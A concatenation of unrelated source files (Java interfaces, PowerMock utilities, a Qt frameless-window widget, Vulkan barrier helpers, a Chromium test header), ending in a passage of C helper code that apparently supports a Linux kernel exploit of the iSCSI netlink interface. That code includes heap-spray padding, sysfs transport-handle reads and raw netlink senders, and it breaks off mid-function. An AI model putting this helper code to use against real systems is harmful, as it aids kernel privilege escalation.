<filename>jetlinks-components/gateway-component/src/main/java/org/jetlinks/community/gateway/spring/MessageListener.java package org.jetlinks.community.gateway.spring; import org.jetlinks.core.event.TopicPayload; import reactor.core.publisher.Mono; public interface MessageListener { Mono<Void> onMessage(TopicPayload message); }
106
6,497
package com.sohu.cache.dao; import com.sohu.cache.entity.InstanceFault; import java.util.List; /** * Created by yijunzhang on 14-12-29. */ public interface InstanceFaultDao { /** * 添加InstanceFault实例 * * @return */ int insert(InstanceFault instanceFault); /** * 实例故障列表 * * @param instId * @return */ List<InstanceFault> getListByInstId(int instId); /** * 应用故障列表 * * @param appId * @return */ List<InstanceFault> getListByAppId(long appId); }
318
3,075
<gh_stars>1000+ /* * Copyright 2009 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.powermock.api.support.membermodification; import org.powermock.api.support.SuppressCode; import org.powermock.api.support.membermodification.strategy.MethodReplaceStrategy; import org.powermock.api.support.membermodification.strategy.MethodStubStrategy; import org.powermock.api.support.membermodification.strategy.impl.MethodReplaceStrategyImpl; import org.powermock.api.support.membermodification.strategy.impl.MethodStubStrategyImpl; import java.lang.reflect.AccessibleObject; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Method; /** * Contains various utilities for modifying members of classes such as * constructors, fields and methods. Modifying means e.g. changing return value * of method invocations or suppressing a constructor. */ public class MemberModifier extends MemberMatcher { /** * Suppress a specific method. This works on both instance methods and * static methods. */ public static void suppress(Method method) { SuppressCode.suppressMethod(method); } /** * Suppress multiple methods. This works on both instance methods and static * methods. */ public static void suppress(Method[] methods) { SuppressCode.suppressMethod(methods); } /** * Suppress a constructor. */ public static void suppress(Constructor<?> constructor) { SuppressCode.suppressConstructor(constructor); } /** * Suppress multiple constructors. */ public static void suppress(Constructor<?>[] constructors) { SuppressCode.suppressConstructor(constructors); } /** * Suppress a field. */ public static void suppress(Field field) { SuppressCode.suppressField(field); } /** * Suppress multiple fields. */ public static void suppress(Field[] fields) { SuppressCode.suppressField(fields); } /** * Suppress an array of accessible objects. */ public static void suppress(AccessibleObject[] accessibleObjects) { if (accessibleObjects == null) { throw new IllegalArgumentException("accessibleObjects cannot be null"); } for (AccessibleObject accessibleObject : accessibleObjects) { if (accessibleObject instanceof Constructor<?>) { SuppressCode.suppressConstructor((Constructor<?>) accessibleObject); } else if (accessibleObject instanceof Field) { SuppressCode.suppressField((Field) accessibleObject); } else if (accessibleObject instanceof Method) { SuppressCode.suppressMethod((Method) accessibleObject); } } } /** * Add a method that should be intercepted and return another value (i.e. * the method is stubbed). */ public static <T> MethodStubStrategy<T> stub(Method method) { return new MethodStubStrategyImpl<T>(method); } /** * Replace a method invocation. */ public static MethodReplaceStrategy replace(Method method) { return new MethodReplaceStrategyImpl(method); } }
1,265
839
<reponame>T-V-J/Qt-Frameless-Window-DarkStyle /* ############################################################################### # # # The MIT License # # # # Copyright (C) 2017 by <NAME> (<EMAIL>) # # >> https://github.com/Jorgen-VikingGod # # # # Sources: https://github.com/Jorgen-VikingGod/Qt-Frameless-Window-DarkStyle # # # ############################################################################### */ #include "framelesswindow.h" #include <QApplication> #include <QDesktopWidget> #include <QGraphicsDropShadowEffect> #include <QScreen> #include "ui_framelesswindow.h" FramelessWindow::FramelessWindow(QWidget *parent) : QWidget(parent), ui(new Ui::FramelessWindow), m_bMousePressed(false), m_bDragTop(false), m_bDragLeft(false), m_bDragRight(false), m_bDragBottom(false) { setWindowFlags(Qt::FramelessWindowHint | Qt::WindowSystemMenuHint); // append minimize button flag in case of windows, // for correct windows native handling of minimize function #if defined(Q_OS_WIN) setWindowFlags(windowFlags() | Qt::WindowMinimizeButtonHint); #endif setAttribute(Qt::WA_NoSystemBackground, true); setAttribute(Qt::WA_TranslucentBackground); ui->setupUi(this); ui->restoreButton->setVisible(false); // shadow under window title text QGraphicsDropShadowEffect *textShadow = new QGraphicsDropShadowEffect; textShadow->setBlurRadius(4.0); textShadow->setColor(QColor(0, 0, 0)); textShadow->setOffset(0.0); ui->titleText->setGraphicsEffect(textShadow); // window shadow QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Highlight)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); QObject::connect(qApp, &QGuiApplication::applicationStateChanged, this, &FramelessWindow::on_applicationStateChanged); setMouseTracking(true); // important to watch mouse move from all child widgets QApplication::instance()->installEventFilter(this); } FramelessWindow::~FramelessWindow() { delete ui; } void FramelessWindow::on_restoreButton_clicked() { ui->restoreButton->setVisible(false); ui->maximizeButton->setVisible(true); setWindowState(Qt::WindowNoState); // on MacOS this hack makes sure the // background window is repaint correctly hide(); show(); } void FramelessWindow::on_maximizeButton_clicked() { ui->restoreButton->setVisible(true); ui->maximizeButton->setVisible(false); this->setWindowState(Qt::WindowMaximized); this->showMaximized(); styleWindow(true, false); } void FramelessWindow::changeEvent(QEvent *event) { if (event->type() == QEvent::WindowStateChange) { if (windowState().testFlag(Qt::WindowNoState)) { ui->restoreButton->setVisible(false); ui->maximizeButton->setVisible(true); styleWindow(true, true); event->ignore(); } else if (windowState().testFlag(Qt::WindowMaximized)) { ui->restoreButton->setVisible(true); ui->maximizeButton->setVisible(false); styleWindow(true, false); event->ignore(); } } event->accept(); } void FramelessWindow::setContent(QWidget *w) { ui->windowContent->layout()->addWidget(w); } void FramelessWindow::setWindowTitle(const QString &text) { ui->titleText->setText(text); } void FramelessWindow::setWindowIcon(const QIcon &ico) { ui->icon->setPixmap(ico.pixmap(16, 16)); } void FramelessWindow::styleWindow(bool bActive, bool bNoState) { if (bActive) { if (bNoState) { layout()->setMargin(15); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:5px; border-top-right-radius:5px; " "background-color:palette(shadow); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(highlight); border-radius:5px " "5px 5px 5px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Highlight)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); } else { layout()->setMargin(0); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:0px; border-top-right-radius:0px; " "background-color:palette(shadow); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(dark); border-radius:0px 0px " "0px 0px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; ui->windowFrame->setGraphicsEffect(nullptr); } // if (bNoState) else maximize } else { if (bNoState) { layout()->setMargin(15); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#windowTitlebar{border: 0px none palette(shadow); " "border-top-left-radius:5px; border-top-right-radius:5px; " "background-color:palette(dark); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid #000000; border-radius:5px 5px 5px " "5px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; QGraphicsDropShadowEffect *windowShadow = new QGraphicsDropShadowEffect; windowShadow->setBlurRadius(9.0); windowShadow->setColor(palette().color(QPalette::Shadow)); windowShadow->setOffset(0.0); ui->windowFrame->setGraphicsEffect(windowShadow); } else { layout()->setMargin(0); ui->windowTitlebar->setStyleSheet(QStringLiteral( "#titlebarWidget{border: 0px none palette(shadow); " "border-top-left-radius:0px; border-top-right-radius:0px; " "background-color:palette(dark); height:20px;}")); ui->windowFrame->setStyleSheet(QStringLiteral( "#windowFrame{border:1px solid palette(shadow); border-radius:0px " "0px 0px 0px; background-color:palette(Window);}")); QGraphicsEffect *oldShadow = ui->windowFrame->graphicsEffect(); if (oldShadow) delete oldShadow; ui->windowFrame->setGraphicsEffect(nullptr); } // if (bNoState) { else maximize } // if (bActive) { else no focus } void FramelessWindow::on_applicationStateChanged(Qt::ApplicationState state) { if (windowState().testFlag(Qt::WindowNoState)) { if (state == Qt::ApplicationActive) { styleWindow(true, true); } else { styleWindow(false, true); } } else if (windowState().testFlag(Qt::WindowFullScreen)) { if (state == Qt::ApplicationActive) { styleWindow(true, false); } else { styleWindow(false, false); } } } void FramelessWindow::on_minimizeButton_clicked() { setWindowState(Qt::WindowMinimized); } void FramelessWindow::on_closeButton_clicked() { close(); } void FramelessWindow::on_windowTitlebar_doubleClicked() { if (windowState().testFlag(Qt::WindowNoState)) { on_maximizeButton_clicked(); } else if (windowState().testFlag(Qt::WindowFullScreen)) { on_restoreButton_clicked(); } } void FramelessWindow::mouseDoubleClickEvent(QMouseEvent *event) { Q_UNUSED(event); } void FramelessWindow::checkBorderDragging(QMouseEvent *event) { if (isMaximized()) { return; } QPoint globalMousePos = event->globalPos(); if (m_bMousePressed) { QScreen *screen = QGuiApplication::primaryScreen(); // available geometry excludes taskbar QRect availGeometry = screen->availableGeometry(); int h = availGeometry.height(); int w = availGeometry.width(); QList<QScreen *> screenlist = screen->virtualSiblings(); if (screenlist.contains(screen)) { QSize sz = QApplication::desktop()->size(); h = sz.height(); w = sz.width(); } // top right corner if (m_bDragTop && m_bDragRight) { int diff = globalMousePos.x() - (m_StartGeometry.x() + m_StartGeometry.width()); int neww = m_StartGeometry.width() + diff; diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; if (neww > 0 && newy > 0 && newy < h - 50) { QRect newg = m_StartGeometry; newg.setWidth(neww); newg.setX(m_StartGeometry.x()); newg.setY(newy); setGeometry(newg); } } // top left corner else if (m_bDragTop && m_bDragLeft) { int diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newy > 0 && newx > 0) { QRect newg = m_StartGeometry; newg.setY(newy); newg.setX(newx); setGeometry(newg); } } // bottom right corner else if (m_bDragBottom && m_bDragLeft) { int diff = globalMousePos.y() - (m_StartGeometry.y() + m_StartGeometry.height()); int newh = m_StartGeometry.height() + diff; diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newh > 0 && newx > 0) { QRect newg = m_StartGeometry; newg.setX(newx); newg.setHeight(newh); setGeometry(newg); } } else if (m_bDragTop) { int diff = globalMousePos.y() - m_StartGeometry.y(); int newy = m_StartGeometry.y() + diff; if (newy > 0 && newy < h - 50) { QRect newg = m_StartGeometry; newg.setY(newy); setGeometry(newg); } } else if (m_bDragLeft) { int diff = globalMousePos.x() - m_StartGeometry.x(); int newx = m_StartGeometry.x() + diff; if (newx > 0 && newx < w - 50) { QRect newg = m_StartGeometry; newg.setX(newx); setGeometry(newg); } } else if (m_bDragRight) { int diff = globalMousePos.x() - (m_StartGeometry.x() + m_StartGeometry.width()); int neww = m_StartGeometry.width() + diff; if (neww > 0) { QRect newg = m_StartGeometry; newg.setWidth(neww); newg.setX(m_StartGeometry.x()); setGeometry(newg); } } else if (m_bDragBottom) { int diff = globalMousePos.y() - (m_StartGeometry.y() + m_StartGeometry.height()); int newh = m_StartGeometry.height() + diff; if (newh > 0) { QRect newg = m_StartGeometry; newg.setHeight(newh); newg.setY(m_StartGeometry.y()); setGeometry(newg); } } } else { // no mouse pressed if (leftBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { setCursor(Qt::SizeFDiagCursor); } else if (rightBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { setCursor(Qt::SizeBDiagCursor); } else if (leftBorderHit(globalMousePos) && bottomBorderHit(globalMousePos)) { setCursor(Qt::SizeBDiagCursor); } else { if (topBorderHit(globalMousePos)) { setCursor(Qt::SizeVerCursor); } else if (leftBorderHit(globalMousePos)) { setCursor(Qt::SizeHorCursor); } else if (rightBorderHit(globalMousePos)) { setCursor(Qt::SizeHorCursor); } else if (bottomBorderHit(globalMousePos)) { setCursor(Qt::SizeVerCursor); } else { m_bDragTop = false; m_bDragLeft = false; m_bDragRight = false; m_bDragBottom = false; setCursor(Qt::ArrowCursor); } } } } // pos in global virtual desktop coordinates bool FramelessWindow::leftBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); if (pos.x() >= rect.x() && pos.x() <= rect.x() + CONST_DRAG_BORDER_SIZE) { return true; } return false; } bool FramelessWindow::rightBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); int tmp = rect.x() + rect.width(); if (pos.x() <= tmp && pos.x() >= (tmp - CONST_DRAG_BORDER_SIZE)) { return true; } return false; } bool FramelessWindow::topBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); if (pos.y() >= rect.y() && pos.y() <= rect.y() + CONST_DRAG_BORDER_SIZE) { return true; } return false; } bool FramelessWindow::bottomBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); int tmp = rect.y() + rect.height(); if (pos.y() <= tmp && pos.y() >= (tmp - CONST_DRAG_BORDER_SIZE)) { return true; } return false; } void FramelessWindow::mousePressEvent(QMouseEvent *event) { if (isMaximized()) { return; } m_bMousePressed = true; m_StartGeometry = this->geometry(); QPoint globalMousePos = mapToGlobal(QPoint(event->x(), event->y())); if (leftBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { m_bDragTop = true; m_bDragLeft = true; setCursor(Qt::SizeFDiagCursor); } else if (rightBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { m_bDragRight = true; m_bDragTop = true; setCursor(Qt::SizeBDiagCursor); } else if (leftBorderHit(globalMousePos) && bottomBorderHit(globalMousePos)) { m_bDragLeft = true; m_bDragBottom = true; setCursor(Qt::SizeBDiagCursor); } else { if (topBorderHit(globalMousePos)) { m_bDragTop = true; setCursor(Qt::SizeVerCursor); } else if (leftBorderHit(globalMousePos)) { m_bDragLeft = true; setCursor(Qt::SizeHorCursor); } else if (rightBorderHit(globalMousePos)) { m_bDragRight = true; setCursor(Qt::SizeHorCursor); } else if (bottomBorderHit(globalMousePos)) { m_bDragBottom = true; setCursor(Qt::SizeVerCursor); } } } void FramelessWindow::mouseReleaseEvent(QMouseEvent *event) { Q_UNUSED(event); if (isMaximized()) { return; } m_bMousePressed = false; bool bSwitchBackCursorNeeded = m_bDragTop || m_bDragLeft || m_bDragRight || m_bDragBottom; m_bDragTop = false; m_bDragLeft = false; m_bDragRight = false; m_bDragBottom = false; if (bSwitchBackCursorNeeded) { setCursor(Qt::ArrowCursor); } } bool FramelessWindow::eventFilter(QObject *obj, QEvent *event) { if (isMaximized()) { return QWidget::eventFilter(obj, event); } // check mouse move event when mouse is moved on any object if (event->type() == QEvent::MouseMove) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { checkBorderDragging(pMouse); } } // press is triggered only on frame window else if (event->type() == QEvent::MouseButtonPress && obj == this) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { mousePressEvent(pMouse); } } else if (event->type() == QEvent::MouseButtonRelease) { if (m_bMousePressed) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { mouseReleaseEvent(pMouse); } } } return QWidget::eventFilter(obj, event); }
7,105
399
#pragma once #include "shared/vkFramework/Renderer.h" /** VkAccessFlags srcAccess, VkAccessFlags dstAccess, VkImageLayout oldLayout VkImageLayout newLayout // Before next stage (convert from ) ImageBarrier(ctx_, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_SHADER_READ_BIT, VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL) // Return back to attachment ImageBarrier(ctx_, VK_ACCESS_SHADER_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL) */ struct ShaderOptimalToColorBarrier : public Renderer { ShaderOptimalToColorBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL); } private: VulkanTexture tex_; }; struct ShaderOptimalToDepthBarrier : public Renderer { ShaderOptimalToDepthBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL); } private: VulkanTexture tex_; }; struct ColorToShaderOptimalBarrier : public Renderer { ColorToShaderOptimalBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct ColorWaitBarrier : public Renderer { ColorWaitBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct DepthToShaderOptimalBarrier : public Renderer { DepthToShaderOptimalBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct ImageBarrier : public Renderer { ImageBarrier(VulkanRenderContext& c, VkAccessFlags srcAccess, VkAccessFlags dstAccess, VkImageLayout oldLayout, VkImageLayout newLayout, VkImage image): Renderer(c), srcAccess_(srcAccess), dstAccess_(dstAccess), oldLayout_(oldLayout), newLayout_(newLayout), image_(image) {} virtual void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) { VkImageMemoryBarrier barrier = { .sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER, .pNext = nullptr, .srcAccessMask = srcAccess_, .dstAccessMask = dstAccess_, .oldLayout = oldLayout_, .newLayout = newLayout_, .srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED, .dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED, .image = image_, .subresourceRange = VkImageSubresourceRange { .aspectMask = VK_IMAGE_ASPECT_COLOR_BIT, .baseMipLevel = 0, .levelCount = 1, .baseArrayLayer = 0, .layerCount = 1 } }; vkCmdPipelineBarrier( cmdBuffer, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier ); #if 0 VkImageMemoryBarrier/*2KHR*/ imageMemoryBarrier = { .sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER, .pNext = nullptr, .srcStageMask = VK_PIPELINE_STAGE_2_COLOR_ATTACHMENT_OUTPUT_BIT_KHR, .srcAccessMask = VK_ACCESS_2_COLOR_ATTACHMENT_WRITE_BIT_KHR, .dstStageMask = VK_PIPELINE_STAGE_2_FRAGMENT_SHADER_BIT_KHR, .dstAccessMask = VK_ACCESS_2_SHADER_READ_BIT_KHR, .oldLayout = VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL, .newLayout = VK_IMAGE_LAYOUT_READ_ONLY_OPTIMAL /* .image and .subresourceRange should identify image subresource accessed */}; vkCmdPipelineBarrier2KHR( ... 1, // imageMemoryBarrierCount &imageMemoryBarrier, // pImageMemoryBarriers ...); vkCmdPipelineBarrier(commandBuffer, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_HOST_BIT, 0, 1, &readoutBarrier, 0, nullptr, 0, nullptr); #endif } private: VkAccessFlags srcAccess_; VkAccessFlags dstAccess_; VkImageLayout oldLayout_; VkImageLayout newLayout_; VkImage image_; };
2,181
575
<filename>chrome/browser/web_applications/test/test_app_registrar.h // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_ #define CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_ #include <map> #include <set> #include <string> #include <vector> #include "base/optional.h" #include "chrome/browser/web_applications/components/app_registrar.h" #include "chrome/browser/web_applications/components/web_app_constants.h" #include "chrome/browser/web_applications/components/web_app_id.h" #include "chrome/browser/web_applications/components/web_application_info.h" #include "components/services/app_service/public/cpp/url_handler_info.h" #include "url/gurl.h" namespace base { class Time; } namespace web_app { // Deprecated. Please use TestWebAppRegistryController instead. class TestAppRegistrar : public AppRegistrar { public: struct AppInfo { GURL install_url; ExternalInstallSource source = ExternalInstallSource::kExternalDefault; GURL launch_url; }; TestAppRegistrar(); ~TestAppRegistrar() override; // Adds |url| to the map of installed apps and returns the generated AppId. void AddExternalApp(const AppId& app_id, const AppInfo& info); // Removes an app from the map of installed apps. void RemoveExternalApp(const AppId& app_id); void RemoveExternalAppByInstallUrl(const GURL& install_url); // AppRegistrar bool IsInstalled(const AppId& app_id) const override; bool IsLocallyInstalled(const AppId& app_id) const override; bool WasInstalledByUser(const AppId& app_id) const override; bool WasInstalledByOem(const AppId& app_id) const override; std::map<AppId, GURL> GetExternallyInstalledApps( ExternalInstallSource install_source) const override; base::Optional<AppId> LookupExternalAppId( const GURL& install_url) const override; bool HasExternalAppWithInstallSource( const AppId& app_id, ExternalInstallSource install_source) const override; int CountUserInstalledApps() const override; std::string GetAppShortName(const AppId& app_id) const override; std::string GetAppDescription(const AppId& app_id) const override; base::Optional<SkColor> GetAppThemeColor(const AppId& app_id) const override; base::Optional<SkColor> GetAppBackgroundColor( const AppId& app_id) const override; const GURL& GetAppStartUrl(const AppId& app_id) const override; const std::string* GetAppLaunchQueryParams( const AppId& app_id) const override; const apps::ShareTarget* GetAppShareTarget( const AppId& app_id) const override; blink::mojom::CaptureLinks GetAppCaptureLinks( const AppId& app_id) const override; const apps::FileHandlers* GetAppFileHandlers( const AppId& app_id) const override; base::Optional<GURL> GetAppScopeInternal(const AppId& app_id) const override; DisplayMode GetAppDisplayMode(const AppId& app_id) const override; DisplayMode GetAppUserDisplayMode(const AppId& app_id) const override; std::vector<DisplayMode> GetAppDisplayModeOverride( const AppId& app_id) const override; apps::UrlHandlers GetAppUrlHandlers(const AppId& app_id) const override; GURL GetAppManifestUrl(const AppId& app_id) const override; base::Time GetAppLastBadgingTime(const AppId& app_id) const override; base::Time GetAppLastLaunchTime(const AppId& app_id) const override; base::Time GetAppInstallTime(const AppId& app_id) const override; std::vector<WebApplicationIconInfo> GetAppIconInfos( const AppId& app_id) const override; SortedSizesPx GetAppDownloadedIconSizesAny( const AppId& app_id) const override; std::vector<WebApplicationShortcutsMenuItemInfo> GetAppShortcutsMenuItemInfos( const AppId& app_id) const override; std::vector<IconSizes> GetAppDownloadedShortcutsMenuIconsSizes( const AppId& app_id) const override; RunOnOsLoginMode GetAppRunOnOsLoginMode(const AppId& app_id) const override; std::vector<AppId> GetAppIds() const override; WebAppRegistrar* AsWebAppRegistrar() override; private: std::map<AppId, AppInfo> installed_apps_; }; } // namespace web_app #endif // CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_
1,443
756
<gh_stars>100-1000 #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <linux/netlink.h> #include <sched.h> #include <stddef.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/un.h> #include <syscall.h> #include <unistd.h> #include "iscsi_if.h" #include "common.h" unsigned char buf_padding[SPRAY0_BUF_LEN0]; /////////////////////////////////////////////////////////////////////////////// // File Functions ///////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int read_file(const char * filename, char * buffer, size_t length) { int fd, result; fd = open(filename, O_RDONLY); if(fd < 0) { printf("Failed to open file %s: (errno %d: %s)\n", filename, errno, strerror(errno)); return -1; } memset(buffer, 0, length); result = read(fd, buffer, length); close(fd); return result; } uint64_t get_uint64_from_file(const char * filename, int is_hex) { uint64_t ret = 0; char buffer[1024]; if(read_file(filename, buffer, sizeof(buffer)) < 0) return 0; if(is_hex) sscanf(buffer, "%lx", &ret); else sscanf(buffer, "%lu", &ret); return ret; } uint64_t get_tcp_transport_handle() { return get_uint64_from_file("/sys/class/iscsi_transport/tcp/handle", 0); } uint64_t get_iser_transport_handle() { return get_uint64_from_file("/sys/class/iscsi_transport/iser/handle", 0); } int iser_transport_handle_exists() { if ( access("/sys/class/iscsi_transport/iser/handle", R_OK ) == 0 ) { return 1; } else { return 0; } } int iscsi_get_file(int hostno) { char filename[256]; snprintf(filename, sizeof(filename), "/sys/class/iscsi_host/host%d/initiatorname", hostno); // leads to seq_read() call return open(filename, O_RDONLY); } /////////////////////////////////////////////////////////////////////////////// // Netlink Functions ////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// void read_response_error(int sock_fd, struct nlmsghdr * nlh, int exit_on_error) { struct iscsi_uevent * ev; struct iovec iov; struct msghdr msg; //Setup the iov and msghdr memset(nlh, 0, NLMSG_LENGTH(MSG_SIZE)); iov.iov_base = (void *)nlh; iov.iov_len = NLMSG_LENGTH(MSG_SIZE); memset(&msg, 0, sizeof(struct msghdr)); msg.msg_iov = &iov; msg.msg_iovlen = 1; if(recvmsg(sock_fd, &msg, 0) < 0) { printf("Couldn't get a reply message (errno %d: %s)\n", errno, strerror(errno)); exit(1); } if(exit_on_error) { ev = NLMSG_DATA(nlh); if(ev->type == ISCSI_KEVENT_IF_ERROR) { printf("Got error: if_error %d (%s)\n", ev->iferror, strerror(-ev->iferror)); exit(1); } } } void read_response(int sock_fd, struct nlmsghdr * nlh) { read_response_error(sock_fd, nlh, 0); } void send_netlink_msg_sized(int sock_fd, struct nlmsghdr * nlh, int size) { struct sockaddr_nl addr; struct iovec iov; struct msghdr msg; //Setup the port to send it to memset(&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = 0; /* For Linux Kernel */ addr.nl_groups = 0; /* unicast */ //Set the flags that are always the same nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = NLM_F_REQUEST; //Setup the iov and msghdr iov.iov_base = (void *)nlh; iov.iov_len = size; memset(&msg, 0, sizeof(msg)); msg.msg_name = (void *)&addr; msg.msg_namelen = sizeof(addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; if(sendmsg(sock_fd, &msg, 0) < 0) { printf("Failed to send message (errno %d: %s)\n", errno, strerror(errno)); exit(1); } } void send_netlink_msg(int sock_fd, struct nlmsghdr * nlh) { send_netlink_msg_sized(sock_fd, nlh, NLMSG_LENGTH(MSG_SIZE)); } /////////////////////////////////////////////////////////////////////////////// // UDP Functions ////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int init_server(struct sockaddr_in *si, int port) { int sock; int err; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sock == -1) { perror("socket"); return -1; } memset(si, 0, sizeof(*si)); si->sin_family = AF_INET; si->sin_port = htons(port); si->sin_addr.s_addr = htonl(INADDR_ANY); err = bind(sock, (struct sockaddr *)si, sizeof(*si)); if (err == -1) { perror("bind"); close(sock); return -1; } int sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff)); sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &sendbuff, sizeof(sendbuff)); return sock; } int init_client(struct sockaddr_in *si, int 